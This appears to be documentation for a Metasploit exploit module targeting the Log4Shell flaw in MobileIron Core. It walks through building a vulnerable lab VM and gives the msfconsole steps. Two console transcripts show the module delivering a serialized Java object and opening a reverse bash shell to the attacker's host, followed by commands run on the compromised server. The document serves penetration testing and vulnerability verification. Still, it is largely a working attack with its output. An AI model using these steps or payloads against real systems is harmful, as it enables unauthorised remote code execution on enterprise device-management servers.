## Vulnerable Application

### Description
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
command execution in the context of the tomcat user.

This module will start an LDAP server that the target will need to connect to.

### Setup
Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.

### MobileIron Core Appliance ISO Installation on VMWare Fusion

1. Obtain a `mobileiron-##.#.#.#-##.iso` file, the following steps utilize `mobileiron-10.6.0.0-23.iso`.
2. Use the ISO to create "A New Virtual Machine".
3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode
so that I can hit it over the network.
4. Boot the new virtual machine.
5. Type `vm-install` at the `boot:` prompt.
6. Wait patiently while the VM reboots and begins the install process. The system *will* reboot when installation completes.
7. When prompted with `Continue with configuration dialog?`, type `yes`
8. Type `q` to clear the license from the screen.
9. Accept the End User License Agreement by typing `yes`
10. Enter a Company Name / contact / email of your choosing. They don't matter.
11. Configure an enable password (e.g. `Labpass1`)
12. Enter an admin user name (e.g. `albinolobster`)
13. Enter and confirm an admin password (e.g. `Labpass1`)
14. Select `a` for the management interface
15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`)
16. Enter your test networks default gateway (e.g. `10.9.49.1`)
17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
static DNS enty to my lab network's router.
18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`)
19. Enter blank entries for name server 2 and 3.
20. `yes` to enable remote shell access (why not, right?)
21. `no` to configuring NTP
22. `no` to configuring system clock
23. `yes` to commit changes
24. Type `reload` to restart the system and `yes`, when prompted, to both saving the configuration and proceeding with the reload
25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
26. Visit `https://ipaddr` to ensure the HTTP server has fully loaded

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/linux/http/mobileiron_core_log4shell`
3. Set the `RHOSTS`, `LHOST`, and `SRVHOST`
4. Do: `run`
5. If the target is vulnerable, the payload should be executed

## Options

## Scenarios

### MobileIron Core 11.2.0.0-31

```
msf6 > use exploit/linux/http/mobileiron_core_log4shell
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
LHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
SRVHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
SRVPORT => 1389
msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
RHOSTS => 10.9.49.100
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[*] Started reverse TCP handler on 10.9.49.248:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
[*] Server stopped.

id
uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
uname -a
Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```

### MobileIron Core 10.6.0.0-23

```
msf6 > use exploit/linux/http/mobileiron_core_log4shell
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
LHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
SRVHOST => 10.9.49.248
msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
SRVPORT => 1389
msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
RHOSTS => 10.9.49.101
msf6 exploit(linux/http/mobileiron_core_log4shell) > run

[*] Started reverse TCP handler on 10.9.49.248:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
[*] Server stopped.

id
uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
uname -a
Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 10.9.49.101 - Command shell session 1 closed.
```
